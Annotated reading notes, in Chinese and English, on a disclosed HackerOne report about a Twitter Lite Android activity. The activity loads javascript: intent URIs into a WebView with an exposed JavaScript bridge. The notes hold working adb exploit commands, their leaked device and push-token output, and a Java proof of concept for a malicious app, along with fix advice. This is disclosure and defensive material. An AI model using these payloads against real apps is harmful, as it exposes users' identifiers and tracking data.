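阅读 HackerOne 上关于 Android 应用的漏洞报告时所做的记录。从下面的命令和输出来看,TwitterLiteActivity 的问题应当在于:Activity 把 Intent 的 data URI 未经 scheme 校验就交给 WebView 加载,而该 WebView 又暴露了 JavaScript 接口(apkInterface)。修复思路是在加载前只放行预期的 scheme 和 host(例如 https),并让 JavaScript 接口只对可信页面可用。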

# Starts TwitterLiteActivity by explicit component name (-n) with a VIEW intent
# whose data URI (-d) uses the javascript: scheme instead of a web URL.
# "//google.com" parses as a JavaScript line comment that the encoded newline
# (%0A) terminates, so a check that only looks at the host text would see
# "google.com" while the script after the newline is what runs.
# The script lists the property names of `window` and writes each one into the
# document - presumably how the `apkInterface` object used below was found.
# NOTE(review): the curly quotes look like a publishing artefact of the page,
# not part of the command as it was originally run.
adb shell am start -a “android.intent.action.VIEW” -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d “javascript://google.com%0Ajavascript:Object.getOwnPropertyNames(window).forEach(function(v%2C%20x)%20%7B%20document.writeln(v)%3B%20%7D)%3B”

# Same launch, but the script calls apkInterface.getApkPushParams() and writes
# the return value into the document. The JSON recorded right after this
# command holds a push token (redacted by the author), a udid and the client
# version, i.e. data the bridge hands to whatever script runs in the WebView.
# Defensive takeaway: the receiving activity should reject data URIs whose
# scheme is not on an allow-list before loading them, and the JavaScript
# bridge should not be reachable from content the app did not load itself.
adb shell am start -a “android.intent.action.VIEW” -n com.twitter.android.lite/com.twitter.android.lite.TwitterLiteActivity -d “javascript://google.com%0Ajavascript:document.write(apkInterface.getApkPushParams())%3B”

{“payload”:{“client_application_id”:14191373,”push_device_info”:{“env”:3,”locale”:”en-IN”,”os_version”:”24”,”token”:”Removed-XIHCvjwARIg8FL8TYxwJZL- TeN4caodfWnpXvV-Removed-UcglqNuRCuM13MHbDQVRgR”,”udid”:”800a1bbb36e7192d”}},”headers”:{“x-twitter-client-version”:”apk.2.1.0–25”}}

设备信息

javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());:

{“aid”:”bf49d6c0-1fec-492f-95af-b81dbf680350”,”limit_ad_tracking”:0,”country_code”:”IN”,”dev_brand”:”xiaomi”,”dev_model”:”Redmi Note 4”,”dev_carrier”:”Jio 4G”,”lang”:”English”,”os_ver”:24,”ts”:1551107789748,”os_name”:”android”,”action”:”open”,”ref”:”javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());”}

# Starts an activity of com.twitter.android by explicit component name; the
# class sits in the androidx.compose.ui.tooling package, so it is presumably
# development tooling - confirm whether it should be present and exported in a
# release build. The data URI is a javascript: URI that calls alert(1).
# The notes record no output for this command or the next one, so whether the
# activity acts on the data URI at all is not shown here.
adb shell am start -n com.twitter.android/androidx.compose.ui.tooling.preview.PreviewActivity -d “javascript://example.com%0A alert(1);”

# Same component, this time with a file:// URI pointing at an HTML file on
# shared storage (/sdcard). Review point for any activity that forwards intent
# data to a WebView: file:// content on shared storage is writable by other
# apps, so it needs the same scheme allow-list as javascript: URIs.
adb shell am start -n com.twitter.android/androidx.compose.ui.tooling.preview.PreviewActivity -d “file:///sdcard/xx.html”

攻击代码(同样的 URI 由设备上的其他应用通过显式 Intent 发送,而不是通过 adb):

// Proof-of-concept from the report notes: another app builds an explicit
// Intent (setClassName) for com.twitter.android.lite's TwitterLiteActivity,
// sets a javascript: URI as the intent data and starts the activity.
// No action is set; only the component and the data URI are supplied.
// The URI is the getNymizerParams() one recorded earlier on this page, whose
// sample output contains an advertising id, device brand/model and carrier.
// Presumably this only works from a third-party app because the activity is
// exported - the adb launches on this page suggest it was; confirm in the manifest.
// Fix belongs in the receiver: validate the scheme (and host) of
// getIntent().getData() before loading it, and keep the JavaScript bridge
// away from untrusted content.
// NOTE(review): the curly quotes are a publishing artefact; as printed the
// line is not valid Java.
Intent intent = new Intent(); intent.setClassName(“com.twitter.android.lite”, “com.twitter.android.lite.TwitterLiteActivity”); intent.setData(Uri.parse(“javascript://google.com%0Ajavascript:document.write(apkInterface.getNymizerParams());”)); startActivity(intent);